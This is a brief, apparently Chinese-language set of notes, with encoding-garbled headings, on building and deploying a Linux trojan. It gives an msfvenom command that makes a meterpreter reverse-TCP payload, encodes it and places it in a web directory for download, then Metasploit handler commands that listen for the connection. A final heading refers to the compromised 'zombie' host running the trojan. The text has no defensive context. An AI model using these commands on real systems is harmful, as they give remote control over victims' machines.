1.åˆ¶ä½œæœ¨é©¬
â”Œâ”€â”€(rootðŸ’€kali-linux-2021-3)-[~]
â””â”€# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=10.211.55.6 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/laohe

2.ç›‘å¬
â”Œâ”€â”€(rootðŸ’€kali-linux-2021-3)-[~]
â””â”€# msfconsole 
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set LHOST 10.211.55.6
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload
msf6 exploit(multi/handler) > run

3.è‚‰é¸¡æ‰§è¡Œæœ¨é©¬
